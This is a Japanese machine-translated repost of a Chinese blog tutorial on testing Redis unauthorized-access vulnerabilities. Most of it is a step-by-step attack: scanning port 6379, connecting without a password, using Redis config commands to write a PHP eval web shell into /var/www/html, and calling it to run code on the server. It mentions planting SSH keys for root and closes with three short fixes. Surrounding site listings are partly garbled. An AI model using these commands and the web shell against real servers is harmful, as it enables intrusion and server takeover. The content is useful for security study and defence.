Web セキュリティ: Redis の不正アクセス脆弱性テスト。 - コードワールド

Web セキュリティ: Redis の不正アクセス脆弱性テスト。

プログラミング 2023-06-25 06:56:00 訪問数: null

Web セキュリティ: Redis の不正アクセス脆弱性テスト。

デフォルトでは、Redis はポート 6379 にバインドされており、信頼できないソースからの IP アクセスなどの他の関連セキュリティポリシーを回避するファイアウォールルールが追加されていない場合、パブリックネットワークに直接公開されます。その場合、パスワードが設定されていないか、弱いパスワードが設定されているため、この脆弱性が発生します。

目次：

Web セキュリティ: Redis の不正アクセス脆弱性テスト。

Redis の不正アクセス脆弱性の害:

Redis の不正アクセス脆弱性テスト:

ステップ 1: ポートスキャンに nmap ツールを使用します。

ステップ 2: Redis に接続して機密情報を取得できるかどうかを確認します。

ステップ 3: Redis の不正な脆弱性を利用してプログラムをアップロードする (トロイの木馬)

ステップ 4: アップロードされたプログラム (トロイの木馬) にアクセスする

ステップ 5: アップロードされたプログラム (トロイの木馬) を使用してサーバーに接続し、制御を取得します。

Redisの不正アクセス脆弱性修復方法:

Redis の不正アクセス脆弱性の害:

黑客可以通过数据备份功能往磁盘写入后门文件

黑客无需认证就可以访问到内部数据，可能导致敏感信息泄露.

然后在 Redis 以 root 身份运行的话，攻击者可以给root账户写入SSH公钥文件，再直接SSH登录目标服务器.

Redis の不正アクセス脆弱性テスト:

ステップ 1: ポートスキャンに nmap ツールを使用します。

nmap 服务器IP -p 查看的端口

nmap 192.168.0.101 -p 6379            //扫描 6379 端口是否开放.

ステップ 2: Redis に接続して機密情報を取得できるかどうかを確認します。

sudo redis-cli -h 192.168.0.101        //连接 Redis 数据库.

info                                   //查看 敏感 信息.

ステップ 3: Redis の不正な脆弱性を利用してプログラムをアップロードする (トロイの木馬)

config set dir /var/www/html        //在网站的根目录/var/www/html下写进去一个脚本.

config set dbfilename bgxg.php        //脚本名称为 bgxg.php

set webshell "<?php @eval($_POST['bgxg']); ?>"        // 脚本内容" 中 "的内容.

save            // 保存 刚刚写入的信息.

ステップ 4: アップロードされたプログラム (トロイの木馬) にアクセスする

http://192.168.0.101/bgxg.php        // bgxg.php 是刚刚写入的木马文件

bgxg=phpinfo();                      // phpinfo(); 查看服务器的信息.

ステップ 5: アップロードされたプログラム (トロイの木馬) を使用してサーバーに接続し、制御を取得します。

Redisの不正アクセス脆弱性修復方法:

（1）Redis 添加密码验证.

（2）禁止外网访问 Redis 端口服务.

（3）修改 Redis 服务 默认端口.

おすすめ

転載: blog.csdn.net/weixin_54977781/article/details/130900745

Web セキュリティ: Redis の不正アクセス脆弱性テスト。

不正アクセスの脆弱性生殖試験をRedisの

Redis 4.x /5.xの不正アクセスの脆弱性

[Webセキュリティ] XXEの脆弱性の概要

Web関連のセキュリティ上の脆弱性

Web 攻撃と防御のためのビジネスセキュリティ: コールバックカスタムテスト (トリガー XSS 脆弱性)

Web アプリケーションのセキュリティの脆弱性

Web セキュリティ: コード実行の脆弱性テスト (ハッカーによるこの脆弱性の悪用を防止します。)

Web セキュリティ: コマンド実行脆弱性テスト (ハッカーによるこの脆弱性の悪用を防止します。)

Web セキュリティ: ミドルウェアの脆弱性

Web セキュリティ: PHP デシリアライゼーションの脆弱性のテスト (サーバーに文を書き込む)

Java セキュリティの脆弱性: Druid の不正アクセスソリューション

Redisの不正アクセスの脆弱性リプレイとリハビリテーションプログラム（未完）

Webセキュリティ

Web セキュリティ: MySQL データベースの弱いパスワードの脆弱性テスト。

【バカ老人シリーズ】2023年5月ネットワークセキュリティ上級講座 041.WEB侵入とセキュリティ（脆弱性学習の3ステップ）

WEB 10 のセキュリティ脆弱性 (OWASP トップ 10) とペネトレーションテストの記録

Webセキュリティの研究ノート（6）コマンドが実行される脆弱性&&ファイルアップロードの脆弱性

Web セキュリティ: ファイルアップロードの脆弱性テスト (ハッカーによるこの脆弱性の悪用を防ぐため)。

[赤安全性]のWebセキュリティDay6 - ビジネスロジックの脆弱性攻撃と守備の戦闘

Web セキュリティ SQL インジェクションの脆弱性テスト (悪意のあるユーザーによる脆弱性の悪用を防ぐことができます)

Web の脆弱性 - XSS クロスサイトコードと Http Only バイパス - XSS Labs 射撃場詳細通関チュートリアル - WAF バイパスとセキュリティ修復

Web サイトのセキュリティレスポンスヘッダーの欠落と PHP 構成の脆弱性

アプリケーションセキュリティ - ツール|データベース - のRedis - 脆弱性 - 概要

横越権テスト - セキュリティの脆弱性

サービス攻撃と防御 - データベースセキュリティ - サービスアプリケーションのセキュリティ問題とテストプロセス - Mysql&Hadoop&不正アクセス&RCE - 脆弱性の再発

Webセキュリティの原則 - ファイルインクルージョンの脆弱性

【Yugongシリーズ】アドバンスネットワークセキュリティクラス047. WEBペネトレーションとセキュリティ（OpenVASオープンソース脆弱性スキャナで実戦を積極的に収集） 2023年5月

Web セキュリティテスト: HTTP リクエストの詳細

Linuxシステムのセキュリティ強化-ZooKeeper不正アクセスの脆弱性ハンドリング

おすすめ

ランキング

--- ELオプションを搭載するテンプレートを指定するオプションをレンダリング別テンプレート/使用を指定するためのオプションを使用して、インラインテンプレート/テンプレートの使用を指定するために、テンプレート/テンプレートオプションを使用してテンプレートを指定します

0216leetcodeはPythonで5つの質問をブラシします

ショック！七つの子どもたちは魂を拷問しました！暴露子どもたちはインサイダーを振っプログラム！

ターゲット属性タグをhtmlの

Linuxビルドnacosスタンドアロンバージョンとクラスター

Cálculo experimental da renda simulada de investimento fixo do fundo

Kali Linux は VMware ツールをインストールします (vmtools ボタンは灰色です)

程序员洞察报告：90后占比过半搜索算法等岗位人才短缺

【Java基礎シリーズチュートリアル】第17章 Javaアノテーション

Javaでの空白を入力できないようにユーザー

アーカイブ

もっと

2024-05-09(30)

2024-05-08(18)

2024-05-07(34)

2024-05-06(6)

2024-05-05(0)

2024-05-04(18)

2024-05-03(8)

2024-05-02(0)

2024-05-01(4)

2024-04-30(35)